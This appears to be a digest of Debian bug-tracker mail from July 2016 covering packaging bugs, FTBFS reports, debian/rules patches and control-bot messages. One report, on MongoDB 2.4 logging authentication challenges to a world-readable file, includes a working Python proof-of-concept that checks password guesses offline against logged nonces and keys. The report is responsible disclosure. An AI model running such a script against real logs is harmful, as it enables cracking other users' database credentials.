Package: bogofilter-bdb,bogofilter-sqlite,bogofilter-tokyocabinet
Version: 1.2.4+dfsg1-6
Severity: serious
User: debian...@lists.debian.org
Usertags: piuparts

Hi,

a test with piuparts revealed that your package misses the copyright
file after an upgrade, which is a violation of Policy 12.5:
https://www.debian.org/doc/debian-policy/ch-docs.html#s-copyrightfile

After the upgrade /usr/share/doc/$PACKAGE/ is just an empty directory.

This was observed on the following upgrade paths:

jessie -> stretch

>From the attached log (scroll to the bottom...):

1m18.5s ERROR: WARN: Inadequate results from running adequate!
  bogofilter-bdb: missing-copyright-file /usr/share/doc/bogofilter-bdb/copyright

  MISSING COPYRIGHT FILE: /usr/share/doc/bogofilter-bdb/copyright
  # ls -lad /usr/share/doc/bogofilter-bdb
  drwxr-xr-x 2 root root 40 Jun 10 11:52 /usr/share/doc/bogofilter-bdb
  # ls -la /usr/share/doc/bogofilter-bdb/
  total 0
  drwxr-xr-x   2 root root   40 Jun 10 11:52 .
  drwxr-xr-x 109 root root 2300 Jun 10 11:52 ..


Additional info may be available here:
https://wiki.debian.org/MissingCopyrightFile

Note that dpkg intentionally does not replace directories with symlinks
and vice versa, you need the maintainer scripts to do this.
See in particular the end of point 4 in
https://www.debian.org/doc/debian-policy/ch-maintainerscripts.html#s-unpackphase

It is recommended to use the dpkg-maintscript-helper commands
'dir_to_symlink' and 'symlink_to_dir' (available since dpkg 1.17.14)
to perform the conversion, ideally using d/$PACKAGE.maintscript.
Do not forget to add 'Pre-Depends: ${misc:Pre-Depends}' in d/control.
See dpkg-maintscript-helper(1) and dh_installdeb(1) for details.


cheers,

Andreas


bogofilter-bdb_1.2.4+dfsg1-6.log.gz
Description: application/gzip
--- End Message ---
--- Begin Message ---
Source: bogofilter
Source-Version: 1.2.4+dfsg1-7

We believe that the bug you reported is fixed in the latest version of
bogofilter, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 832...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Herbert Parentes Fortes Neto  (supplier of updated bogofilter 
package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Format: 1.8
Date: Thu, 28 Jul 2016 10:47:54 -0300
Source: bogofilter
Binary: bogofilter bogofilter-bdb bogofilter-sqlite bogofilter-tokyocabinet 
bogofilter-common
Architecture: source amd64 all
Version: 1.2.4+dfsg1-7
Distribution: unstable
Urgency: medium
Maintainer: Debian QA Group 
Changed-By: Herbert Parentes Fortes Neto 
Description:
 bogofilter - fast Bayesian spam filter (dummy package)
 bogofilter-bdb - fast Bayesian spam filter (Berkeley DB)
 bogofilter-common - fast Bayesian spam filter (common files)
 bogofilter-sqlite - fast Bayesian spam filter (sqlite)
 bogofilter-tokyocabinet - fast Bayesian spam filter (tokyocabinet)
Closes: 832291
Changes:
 bogofilter (1.2.4+dfsg1-7) unstable; urgency=medium
 .
   * QA upload. (Closes: #832291). Thanks Andreas Beckmann.
   * debian/copyright:
   - updated my email address.
   * debian/control:
   - Pre-Depends: ${misc:Pre-Depends} added  to bogofilter and
bogofilter-{bdb, sqlite, tokyocabinet}
   * debian/bogofilter.links removed:
   - Not necessary. dh_installdocs is taking care of it.
   * debian/bogofilter.preinst (created):
 debian/bogofilter-bdb.preinst:
 debian/bogofilter-sqlite.preinst:
 debian/bogofilter-tokyocabinet.preinst:
   - using the script from https://wiki.debian.org/MissingCopyrightFile
Checksums-Sha1:
 0fca212e4c1f0349be8d059a3565f3c6dce88f16 2278 

Bug#830390: marked as done (xfonts-cronyx: FTBFS: dh_clean: Please specify the compatibility level in debian/compat)

[Debian Bug Tracking System]

Your message dated Sun, 31 Jul 2016 18:21:36 +
with message-id 
and subject line Bug#830390: fixed in xfonts-cronyx 2.3.8-8
has caused the Debian Bug report #830390,
regarding xfonts-cronyx: FTBFS: dh_clean: Please specify the compatibility 
level in debian/compat
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
830390: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=830390
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: xfonts-cronyx
Version: 2.3.8-6
Severity: serious
Tags: stretch sid
User: debian...@lists.debian.org
Usertags: qa-ftbfs-20160707 qa-ftbfs
Justification: FTBFS on amd64

Hi,

During a rebuild of all packages in sid, your package failed to build on
amd64.

Relevant part (hopefully):
> make[2]: Entering directory '/«PKGBUILDDIR»'
> rm -f 100dpi/crox4to.bdf 100dpi/crox3to.bdf 100dpi/crox5ho.bdf 
> 100dpi/crox6to.bdf 100dpi/crox1co.bdf 100dpi/crox1to.bdf 100dpi/crox2co.bdf 
> 100dpi/crox6ho.bdf 100dpi/crox4ho.bdf 100dpi/crox2ho.bdf 100dpi/crox3co.bdf 
> 100dpi/crox5to.bdf 100dpi/crox1ho.bdf 100dpi/crox3ho.bdf 100dpi/crox2to.bdf 
> 75dpi/crox4to.bdf 75dpi/crox3to.bdf 75dpi/crox5ho.bdf 75dpi/crox6to.bdf 
> 75dpi/crox1co.bdf 75dpi/crox1to.bdf 75dpi/crox2co.bdf 75dpi/crox6ho.bdf 
> 75dpi/crox4ho.bdf 75dpi/crox2ho.bdf 75dpi/crox3co.bdf 75dpi/crox5to.bdf 
> 75dpi/crox1ho.bdf 75dpi/crox3ho.bdf 75dpi/crox2to.bdf 100dpi/crox4tb.bdf 
> 100dpi/crox3tb.bdf 100dpi/crox5hb.bdf 100dpi/crox6tb.bdf 100dpi/crox1cb.bdf 
> 100dpi/crox1tb.bdf 100dpi/crox2cb.bdf 100dpi/crox6hb.bdf 100dpi/crox4hb.bdf 
> 100dpi/crox2hb.bdf 100dpi/crox3cb.bdf 100dpi/crox5tb.bdf 100dpi/crox1hb.bdf 
> 100dpi/crox3hb.bdf 100dpi/crox2tb.bdf 75dpi/crox4tb.bdf 75dpi/crox3tb.bdf 
> 75dpi/crox5hb.bdf 75dpi/crox6tb.bdf 75dpi/crox1cb.bdf 75dpi/crox1tb.bdf 
> 75dpi/crox2cb.bdf 75dpi/crox6hb.bdf 75dpi/crox4hb.bdf 75dpi/crox2hb.bdf 
> 75dpi/crox3cb.bdf 75dpi/crox5tb.bdf 75dpi/crox1hb.bdf 75dpi/crox3hb.bdf 
> 75dpi/crox2tb.bdf 100dpi/crox4tbo.bdf 100dpi/crox3tbo.bdf 100dpi/crox5hbo.bdf 
> 100dpi/crox6tbo.bdf 100dpi/crox1cbo.bdf 100dpi/crox1tbo.bdf 
> 100dpi/crox2cbo.bdf 100dpi/crox6hbo.bdf 100dpi/crox4hbo.bdf 
> 100dpi/crox2hbo.bdf 100dpi/crox3cbo.bdf 100dpi/crox5tbo.bdf 
> 100dpi/crox1hbo.bdf 100dpi/crox3hbo.bdf 100dpi/crox2tbo.bdf 
> 75dpi/crox4tbo.bdf 75dpi/crox3tbo.bdf 75dpi/crox5hbo.bdf 75dpi/crox6tbo.bdf 
> 75dpi/crox1cbo.bdf 75dpi/crox1tbo.bdf 75dpi/crox2cbo.bdf 75dpi/crox6hbo.bdf 
> 75dpi/crox4hbo.bdf 75dpi/crox2hbo.bdf 75dpi/crox3cbo.bdf 75dpi/crox5tbo.bdf 
> 75dpi/crox1hbo.bdf 75dpi/crox3hbo.bdf 75dpi/crox2tbo.bdf
> make[2]: Leaving directory '/«PKGBUILDDIR»'
> rm -rf  unicode-100dpi cp1251-100dpi isocyr-100dpi koi8r-100dpi koi8u-100dpi  
> unicode-75dpi cp1251-75dpi isocyr-75dpi koi8r-75dpi koi8u-75dpi  unicode-misc 
> cp1251-misc isocyr-misc koi8r-misc koi8u-misc
> rm -f  cronyx-unicode-conv screen-unicode-conv sony-unicode-conv 
> winitzki-unicode-conv  cronyx-cp1251-conv screen-cp1251-conv sony-cp1251-conv 
> winitzki-cp1251-conv  cronyx-isocyr-conv screen-isocyr-conv sony-isocyr-conv 
> winitzki-isocyr-conv  cronyx-koi8r-conv screen-koi8r-conv sony-koi8r-conv 
> winitzki-koi8r-conv  cronyx-koi8u-conv screen-koi8u-conv sony-koi8u-conv 
> winitzki-koi8u-conv
> rm -f  debian/unicode-misc.alias  debian/cp1251-misc.alias  
> debian/isocyr-misc.alias  debian/koi8r-misc.alias  debian/koi8u-misc.alias
> rm -f my_clean
> make[1]: Leaving directory '/«PKGBUILDDIR»'
> dh_clean
> dh_clean: Please specify the compatibility level in debian/compat
> make: *** [clean] Error 2

The full build log is available from:
   
http://people.debian.org/~lucas/logs/2016/07/07/xfonts-cronyx_2.3.8-6_unstable_reb.normal.log

A list of current common problems and possible solutions is available at
http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute!

About the archive rebuild: The rebuild was done on EC2 VM instances from
Amazon Web Services, using a clean, minimal and up-to-date chroot. Every
failed build was retried once to eliminate random failures.
--- End Message ---
--- Begin Message ---
Source: xfonts-cronyx
Source-Version: 2.3.8-8

We believe that the bug you reported is fixed in the latest version of
xfonts-cronyx, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 830...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution 

Processed: Re: ndoutils: Build arch:all+arch:any but is missing build-{arch,indep} targets

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> tags 822008 + patch
Bug #822008 [src:ndoutils] ndoutils: Build arch:all+arch:any but is missing 
build-{arch,indep} targets
Added tag(s) patch.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
822008: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=822008
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Processed: reassign 822305 to ftp.debian.org, severity of 822305 is normal

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> reassign 822305 ftp.debian.org
Bug #822305 [src:openvrml] RM: openvrml -- RoQA, unmaintained, RC-buggy, FTBFS, 
blocks removal of old packages
Bug reassigned from package 'src:openvrml' to 'ftp.debian.org'.
No longer marked as found in versions openvrml/0.18.9-7.1.
Ignoring request to alter fixed versions of bug #822305 to the same values 
previously set
> severity 822305 normal
Bug #822305 [ftp.debian.org] RM: openvrml -- RoQA, unmaintained, RC-buggy, 
FTBFS, blocks removal of old packages
Severity set to 'normal' from 'serious'
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
822305: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=822305
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#822008: ndoutils: Build arch:all+arch:any but is missing build-{arch,indep} targets

[Santiago Vila]

tags 822008 + patch
thanks

On Wed, 20 Apr 2016, ni...@thykier.net wrote:

> Package: ndoutils
> Severity: normal
> Usertags: arch-all-and-any-missing-targets
> 
> Hi,
> 
> The package ndoutils builds an architecture independent *and* an
> architecture dependent package, but does not have the (now mandatory)
> "build-arch" and "build-indep" targets in debian/rules.

Actually, this package does not even have a "build" target.

The reason "dpkg-buildpackage" works at all is that "build" is marked
as a PHONY target and make says this:

make: Nothing to be done for 'build'.

(instead of just failing).

The build works because the different binary-* targets depend on
several build-* targets, but this makes most of the build to be done
as root, which is generally undesirable (see Bug #806654 for an example).

As usual, I recommend switching to "dh", but in the meantime, the
attached trivial patch should make "dpkg-buildpackage -A" and
"dpkg-buildpackage -B" to work again.

Thanks.--- a/debian/rules
+++ b/debian/rules
@@ -331,4 +331,4 @@ ndoutils-doc:
 #  dh_builddeb
 
 binary: binary-arch binary-indep
-.PHONY: build clean binary-indep binary-arch binary install install-indep 
install-arch
+.PHONY: build build-arch build-indep clean binary-indep binary-arch binary 
install install-indep install-arch

Bug#830842: State of Maps in Stable

[Michael Biebl]

Am 31.07.2016 um 14:52 schrieb James Rowan Lloyd:
> Hi,
> 
> I understand that this bug has been fixed upstream in the latest version
> that is set to hit unstable. However, given that this bug affects all
> versions, including stable, I'm wondering if there is any plan to patch
> it and fix it in jessie. It's a pretty horrendous bug for an application
> that is part of a default gnome-desktop task on a fresh installation of
> debian stable to be basically completely unusable. Obviously I'm
> contacting you because I like gnome-maps I would like it working on my
> system sooner than whenever stretch is released, but it's still bad from
> a objective perspective for this bug not to be fixed in stable. Please
> consider and let me know.

There is a fixed version for GNOME 3.14, as version 3.14.3.

Someone needs to poke the stable release managers about this


-- 
Why is it that all of the instruments seeking intelligent life in the
universe are pointed away from Earth?



signature.asc
Description: OpenPGP digital signature

Bug#833087: bruteforcable challenge responses in unprotected logfile

[kpcyrd]

Package: mongodb-server
Version: 2.4.10-5
Severity: grave
Tags: security

There's a bugfix[1] from 2013 for an issue that wasn't announced for
security that's currently not included in debian stable.

[1]: https://jira.mongodb.org/browse/SERVER-9476

Current mongodb in stable logs authentication attempts like this:

Sat Jul 30 21:57:08.657 [initandlisten] connection accepted from 
127.0.0.1:62883 #9 (1 connection now open)
Sat Jul 30 21:57:16.677 [conn9]  authenticate db: test { authenticate: 
1, nonce: "7222f1306039344e", user: "foo", key: 
"84bed68ebbe64358e836186f95315328" }
Sat Jul 30 21:57:16.677 [conn9] auth: couldn't find user foo@test, 
test.system.users
Sat Jul 30 21:57:18.385 [conn9] end connection 127.0.0.1:62883 (0 
connections now open)

The logfile is world readable for all local users on a default
installation. The above snippet maps to a login attempt as foo:bar.

key= is the resulting md5 hash of a function that takes nonce=, user=
and password as parameters

Below is a script that's able to take the parameters from the logfile
and verify if a given password was used for authentication, making it
suitable for offline bruteforce. (results may vary depending on password
quality, of course)

```
#!/usr/bin/env python3
'''
Login attempt with foo:bar

Sat Jul 30 21:57:08.657 [initandlisten] connection accepted from 
127.0.0.1:62883 #9 (1 connection now open)
Sat Jul 30 21:57:16.677 [conn9]  authenticate db: test { authenticate: 1, 
nonce: "7222f1306039344e", user: "foo", key: "84bed68ebbe64358e836186f95315328" 
}
Sat Jul 30 21:57:16.677 [conn9] auth: couldn't find user foo@test, 
test.system.users
Sat Jul 30 21:57:18.385 [conn9] end connection 127.0.0.1:62883 (0 connections 
now open)

$ ./mongobrute.py 7222f1306039344e foo 84bed68ebbe64358e836186f95315328 bar
[+] Password matches challenge key: b'bar'
$
'''
from hashlib import md5
import sys


def createPasswordDigest(username, clearTextPassword):
return md5(username + b':mongo:' + clearTextPassword).hexdigest()


def recalculateChallenge(nonce, user, password):
digested = createPasswordDigest(user, password)
digested_bytes = bytes(digested, 'utf-8')
return md5(nonce + user + digested_bytes).hexdigest()


if __name__ == '__main__':
try:
nonce = bytes(sys.argv[1], 'utf-8')
user = bytes(sys.argv[2], 'utf-8')
key = sys.argv[3]
password = bytes(sys.argv[4], 'utf-8')
except IndexError:
print('Usage: %s' % 
sys.argv[0], file=sys.stderr)
exit(2)

challenge = recalculateChallenge(nonce, user, password)

if challenge == key:
print('[+] Password matches challenge key: %r' % password)
else:
print('[-] Password does not match challenge key: %r' % password)
exit(1)
```

This is a slightly modified version of the mail I sent to security@ for
responsible disclosure and got the go-ahead to post it on the public
bugtracker.

This got fixed with f85ceb1 by upstream (released in 2.5.4), stretch
isn't affected.

Thanks.

Processed: Re: tcm: Build arch:all+arch:any but is missing build-{arch,indep} targets

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> tags 822031 + patch
Bug #822031 [src:tcm] tcm: Build arch:all+arch:any but is missing 
build-{arch,indep} targets
Added tag(s) patch.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
822031: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=822031
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#822031: tcm: Build arch:all+arch:any but is missing build-{arch,indep} targets

[Santiago Vila]

tags 822031 + patch
thanks

On Wed, 20 Apr 2016, ni...@thykier.net wrote:

> Package: tcm
> Severity: normal
> Usertags: arch-all-and-any-missing-targets
> 
> Hi,
> 
> The package tcm builds an architecture independent *and* an
> architecture dependent package, but does not have the (now mandatory)
> "build-arch" and "build-indep" targets in debian/rules.

It's funny but this package is unique in that it has a build-indep
target but not a build-arch target.

The build-indep target is actually empty but binary-indep depends on
the build target. As a result, "dpkg-buildpackage -A" will probably
invoke build-indep as a normal user, then binary-indep as root, which
makes most of the build to be done by root.

This is generally not desirable (see Bug #806654 for an example).

Splitting the build into build-arch and build-indep would be nice, but
this may be done after switching to dh. In the meantime, I would recommend
doing things in the traditional way (i.e. having a build target which
builds everything), as in the attached patch.

Thanks.--- a/debian/rules
+++ b/debian/rules
@@ -22,15 +22,9 @@ configure-stamp:
cp debian/Config.tmpl src/
touch configure-stamp
 
-build-indep:
-#  $(MAKE) TCM_INSTALL_DIR=/usr \
-#  CONFIG_INSTALL=/etc/tcm/ \
-#  TCM_INSTALL_DOC=/usr/share/doc/tcm-doc \
-#  TCM_INSTALL_SHARE=/usr/share/doc/tcm-doc/ \
-#  TCM_INSTALL_MAN=/usr/share/man \
-#  docs
-
-build: build-indep build-stamp
+build-arch: build
+build-indep: build
+build: build-stamp
 build-stamp: configure-stamp patch-stamp
dh_testdir
 
@@ -135,4 +129,4 @@ binary-arch: build install
dh_builddeb -a
 
 binary: binary-indep binary-arch
-.PHONY: build build-indep clean binary-indep binary-arch binary install 
configure
+.PHONY: build build-arch build-indep clean binary-indep binary-arch binary 
install configure

Processed: found 822749 in 1.7~git20150920+dfsg-1

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> found 822749 1.7~git20150920+dfsg-1
Bug #822749 [src:heimdal] heimdal ftbfs on all 32bit architectures
Marked as found in versions heimdal/1.7~git20150920+dfsg-1.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
822749: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=822749
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Processed: found 822749 in 1.7~git20150920+dfsg-2

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> found 822749 1.7~git20150920+dfsg-2
Bug #822749 [src:heimdal] heimdal ftbfs on all 32bit architectures
Marked as found in versions heimdal/1.7~git20150920+dfsg-2.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
822749: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=822749
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Processed: found 822749 in 1.7~git20150920+dfsg-3

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> found 822749 1.7~git20150920+dfsg-3
Bug #822749 [src:heimdal] heimdal ftbfs on all 32bit architectures
Marked as found in versions heimdal/1.7~git20150920+dfsg-3.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
822749: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=822749
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Processed: found 822749 in 1.7~git20150920+dfsg-4

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> found 822749 1.7~git20150920+dfsg-4
Bug #822749 [src:heimdal] heimdal ftbfs on all 32bit architectures
Ignoring request to alter found versions of bug #822749 to the same values 
previously set
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
822749: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=822749
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Processed: found 822749 in 1.7~git20150920+dfsg-4

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> found 822749 1.7~git20150920+dfsg-4
Bug #822749 [src:heimdal] heimdal ftbfs on all 32bit architectures
Marked as found in versions heimdal/1.7~git20150920+dfsg-4.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
822749: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=822749
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#822001: libcorelinux: Build arch:all+arch:any but is missing build-{arch,indep} targets

[Santiago Vila]

tags 822001 + patch
thanks

I also recommend switching to dh, but in the meantime, the attached
patch should work.

Thanks.--- a/debian/rules
+++ b/debian/rules
@@ -13,6 +13,8 @@ top_srcdir=..
 # This is the debhelper compatibility version to use.
 export DH_COMPAT=3
 
+build-arch: build
+build-indep: build
 build: build-stamp
 build-stamp:
dh_testdir
@@ -97,4 +99,4 @@ binary-arch: build install
 
 binary: binary-indep binary-arch
 
-.PHONY: build clean binary-indep binary-arch binary install
+.PHONY: build build-arch build-indep clean binary-indep binary-arch binary 
install

Processed: Re: libcorelinux: Build arch:all+arch:any but is missing build-{arch,indep} targets

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> tags 822001 + patch
Bug #822001 [src:libcorelinux] libcorelinux: Build arch:all+arch:any but is 
missing build-{arch,indep} targets
Added tag(s) patch.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
822001: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=822001
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#833077: marked as done (fastinfoset: FTBFS: Could not resolve dependencies for project com.sun.xml.fastinfoset:FastInfosetUtilities:jar:1.2.12)

[Debian Bug Tracking System]

Your message dated Sun, 31 Jul 2016 17:26:49 +
with message-id 
and subject line Bug#833077: fixed in fastinfoset 1.2.12-2
has caused the Debian Bug report #833077,
regarding fastinfoset: FTBFS: Could not resolve dependencies for project 
com.sun.xml.fastinfoset:FastInfosetUtilities:jar:1.2.12
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
833077: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=833077
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: fastinfoset
Version: 1.2.12-1
Severity: serious
Justification: fails to build from source
User: reproducible-bui...@lists.alioth.debian.org
Usertags: ftbfs
X-Debbugs-Cc: reproducible-bui...@lists.alioth.debian.org

Dear Maintainer,

fastinfoset fails to build from source in unstable/amd64:

  [..]

  Adding debian:Global_Chambersign_Root_-_2008.pem
  Adding debian:Go_Daddy_Class_2_CA.pem
  Adding debian:Go_Daddy_Root_Certificate_Authority_-_G2.pem
  Adding debian:Hellenic_Academic_and_Research_Institutions_RootCA_2011.pem
  Adding debian:Hongkong_Post_Root_CA_1.pem
  Adding debian:IGC_A.pem
  Adding debian:IdenTrust_Commercial_Root_CA_1.pem
  Adding debian:IdenTrust_Public_Sector_Root_CA_1.pem
  Adding debian:Izenpe.com.pem
  Adding debian:Juur-SK.pem
  Adding debian:Microsec_e-Szigno_Root_CA.pem
  Adding debian:Microsec_e-Szigno_Root_CA_2009.pem
  Adding debian:NetLock_Arany_=Class_Gold=_Főtanúsítvány.pem
  Adding debian:NetLock_Business_=Class_B=_Root.pem
  Adding debian:NetLock_Express_=Class_C=_Root.pem
  Adding debian:NetLock_Notary_=Class_A=_Root.pem
  Adding debian:NetLock_Qualified_=Class_QA=_Root.pem
  Adding debian:Network_Solutions_Certificate_Authority.pem
  Adding debian:OISTE_WISeKey_Global_Root_GA_CA.pem
  Adding debian:OISTE_WISeKey_Global_Root_GB_CA.pem
  Adding debian:PSCProcert.pem
  Adding debian:QuoVadis_Root_CA.pem
  Adding debian:QuoVadis_Root_CA_1_G3.pem
  Adding debian:QuoVadis_Root_CA_2.pem
  Adding debian:QuoVadis_Root_CA_2_G3.pem
  Adding debian:QuoVadis_Root_CA_3.pem
  Adding debian:QuoVadis_Root_CA_3_G3.pem
  Adding debian:RSA_Security_2048_v3.pem
  Adding debian:Root_CA_Generalitat_Valenciana.pem
  Adding debian:S-TRUST_Authentication_and_Encryption_Root_CA_2005_PN.pem
  Adding debian:S-TRUST_Universal_Root_CA.pem
  Adding debian:SecureSign_RootCA11.pem
  Adding debian:SecureTrust_CA.pem
  Adding debian:Secure_Global_CA.pem
  Adding debian:Security_Communication_EV_RootCA1.pem
  Adding debian:Security_Communication_RootCA2.pem
  Adding debian:Security_Communication_Root_CA.pem
  Adding debian:Sonera_Class_1_Root_CA.pem
  Adding debian:Sonera_Class_2_Root_CA.pem
  Adding debian:Staat_der_Nederlanden_EV_Root_CA.pem
  Adding debian:Staat_der_Nederlanden_Root_CA.pem
  Adding debian:Staat_der_Nederlanden_Root_CA_-_G2.pem
  Adding debian:Staat_der_Nederlanden_Root_CA_-_G3.pem
  Adding debian:Starfield_Class_2_CA.pem
  Adding debian:Starfield_Root_Certificate_Authority_-_G2.pem
  Adding debian:Starfield_Services_Root_Certificate_Authority_-_G2.pem
  Adding debian:StartCom_Certification_Authority.pem
  Adding debian:StartCom_Certification_Authority_2.pem
  Adding debian:StartCom_Certification_Authority_G2.pem
  Adding debian:SwissSign_Gold_CA_-_G2.pem
  Adding debian:SwissSign_Platinum_CA_-_G2.pem
  Adding debian:SwissSign_Silver_CA_-_G2.pem
  Adding debian:Swisscom_Root_CA_1.pem
  Adding debian:Swisscom_Root_CA_2.pem
  Adding debian:Swisscom_Root_EV_CA_2.pem
  Adding debian:T-TeleSec_GlobalRoot_Class_2.pem
  Adding debian:T-TeleSec_GlobalRoot_Class_3.pem
  Adding debian:TC_TrustCenter_Class_3_CA_II.pem
  Adding debian:TURKTRUST_Certificate_Services_Provider_Root_2007.pem
  Adding debian:TWCA_Global_Root_CA.pem
  Adding debian:TWCA_Root_Certification_Authority.pem
  Adding debian:Taiwan_GRCA.pem
  Adding debian:TeliaSonera_Root_CA_v1.pem
  Adding debian:Trustis_FPS_Root_CA.pem
  Adding debian:TÜBİTAK_UEKAE_Kök_Sertifika_Hizmet_Sağlayıcısı_-_Sürüm_3.pem
  Adding debian:TÜRKTRUST_Elektronik_Sertifika_Hizmet_Sağlayıcısı_H5.pem
  Adding debian:TÜRKTRUST_Elektronik_Sertifika_Hizmet_Sağlayıcısı_H6.pem
  Adding debian:USERTrust_ECC_Certification_Authority.pem
  Adding debian:USERTrust_RSA_Certification_Authority.pem
  Adding debian:UTN_USERFirst_Email_Root_CA.pem
  Adding debian:UTN_USERFirst_Hardware_Root_CA.pem
  Adding debian:VeriSign_Class_3_Public_Primary_Certification_Authority_-_G4.pem
  Adding debian:VeriSign_Class_3_Public_Primary_Certification_Authority_-_G5.pem
  Adding debian:VeriSign_Universal_Root_Certification_Authority.pem
  Adding 

Bug#717487: please keep xfm out of testing (I plan to request removal)

[Christian Hofstaedtler]

Bernhard,

* Bernhard R. Link  [160731 17:20]:
> Package: xfm
> 
> As xfm lost updates to file format detection as libmagic no longer
> ships magic definitions for other programs and due to its old age,
> I plan to request removal of xfm.
> 
> To give anyone a fair warning time, I'm filing this bug to keep it
> out of testing.

Maybe the time has come to remove xfm from unstable?

Thanks,
-- 
 ,''`.  Christian Hofstaedtler 
: :' :  Debian Developer
`. `'   7D1A CFFA D9E0 806C 9C4C  D392 5C13 D6DB 9305 2E03
  `-

Bug#823030: [pkg-opensc-maint] Bug#823030: Status

[José Luis González]

On Sat, 30 Jul 2016 15:32:55 -0400
Eric Dorland  wrote:

> * José Luis González (jlgon...@ya.com) wrote:
> > On Sat, 30 Jul 2016 01:53:17 -0400
> > Eric Dorland  wrote:
> > 
> > > Control: tags -1 moreinfo
> > > 
> > > What software is breaking exactly? You should not need libopensc2, it
> > > was always an internal library.
> > 
> > It's an external package, from Spain's ID card electronic signing
> > system. As far as I remember it depended on those packages.
> > 
> > I managed to install the external packages with packages from stable.
> 
> Is it actually linking against libopensc2?

Hi,

I just found out the conflicting package wasn't installed on my system
as it depended on a release previous to Wheezy. Actually I'm not sure
this particular package is needed anymore since the Spanish police
hasn't provided packages for newer Debian versions for a very long
time. However the other package (which doesn't require libopensc2 and
installs correctly with stable repositories) seems not to work OK with
my ID card, although I can't tell what's the reason for this. Since the
packages requiring libopensc2 and old opensc are probably not necessary
I think you can close this report. I will try to find out why the ID
card is not working on my system and if it's related to Debian opensc I
would reopen this or open a new report as appropriate.

Thank you so much for your understanding and assistance.

Bug#832589: marked as done (nvidia-cuda-toolkit: FTBFS when built with dpkg-buildpackage -A (Missing build-indep target))

[Debian Bug Tracking System]

Your message dated Sun, 31 Jul 2016 16:42:18 +
with message-id 
and subject line Bug#832589: fixed in nvidia-cuda-toolkit 7.5.18-3
has caused the Debian Bug report #832589,
regarding nvidia-cuda-toolkit: FTBFS when built with dpkg-buildpackage -A 
(Missing build-indep target)
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
832589: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832589
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: src:nvidia-cuda-toolkit
Version: 7.5.18-2
Severity: serious

Dear maintainer:

I tried to build this package with "dpkg-buildpackage -A"
(i.e. only architecture-independent packages), and it failed:


[...]
 debian/rules build-indep
make: *** No rule to make target 'build-indep'.  Stop.
dpkg-buildpackage: error: debian/rules build-indep gave error exit status 2


This prevents the package from being uploaded in source-only form
(which I see you already do).

This kind of bug is now considered RC (see Bug #830997 for details), but
being this such a big package (more than 1 GB), I'd say it is in your
own interest to fix it, so that you can continue to upload the package
in source-only form.

Thanks.
--- End Message ---
--- Begin Message ---
Source: nvidia-cuda-toolkit
Source-Version: 7.5.18-3

